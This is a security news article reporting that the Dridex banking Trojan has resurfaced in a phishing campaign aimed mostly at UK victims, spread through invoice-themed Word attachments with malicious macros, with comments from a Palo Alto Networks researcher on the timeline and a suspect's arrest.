Conspicuously off the grid for close to two months, the Dridex banking Trojan made some noise Thursday morning when a large phishing campaign, primarily targeting victims in the U.K., was corralled by researchers at Palo Alto Networks.
The phishing emails are laced with a Microsoft Word document that entices users to enable macros that call out to attacker-controlled websites and download the banking malware. The campaign is still active, Palo Alto intelligence director Ryan Olson said.
Dridex, meanwhile, had been pretty quiet after a raucous period of activity earlier this year in which different-themed phishing and spam campaigns used macros used to download the malware from the Web. Macros, which are disabled by default in Office, are a decidedly old-school means of spreading malware that have definitely made a resurgence in 2015 with Dridex leading the way.
“At the beginning of the year, we saw an uptick in Word docs using macros to install malware. We were super-surprised by this at the time because macro-based malware had all but disappeared since they were disabled by default in Office. We couldn’t figure it out,” Olson said. “I think it’s just a new generation of people who didn’t live through the pain of the late 1990s and early 2000s when it was a terrible thing that macros were enabled in Word or Excel. Today, they’re just clicking ‘Yes’ to enable macros.”
The phishing messages in this and other Dridex campaigns have been fairly convincing in getting users to comply. Generally, the emails mention some kind of business or retail order and ask for payment. The malicious attachments pretend to be an invoice, and the user is presented with a dialog box that asks them to enable macros in order to view the document.
In this case, the macros reach out to one of a handful of URLs to grab the malware. Palo Alto has published a list of the download URLs, command and control domains and other indicators of compromise.
Dridex, however, had all but dropped off the map since the end of the summer. One reason could be the arrest in early September in Cyprus of a 30-year-old Moldovan man allegedly behind the development an distribution of the malware.
Security blog Krebs on Security reported on the arrests on Sept. 7 and cited unnamed sources who said the man had ties to a cybercrime gang responsible for Dridex that may have been spun off from a notorious Eastern European gang called the Business Club accused of using malware to steal $100 million from banks worldwide.
“Between the end of August and now, we had seen no Dridex activity at all,” Olson said. “We attribute that to the arrest. We assumed there was some organizational shakeup and people were regrouping. It popped up again this morning with some volume.”
Unlike in early January when Dridex emails were peaking at close to 100,000 per day, Olson said today’s resurgence capped at around 20,000, mostly in the U.K.
“It’s been mostly U.K. all along,” Olson said. “It’s likely that their best opportunity for cashing out may be in the U.K. Either they have accounts or money mules there. The infrastructure is likely best set up for U.K.-based banks.”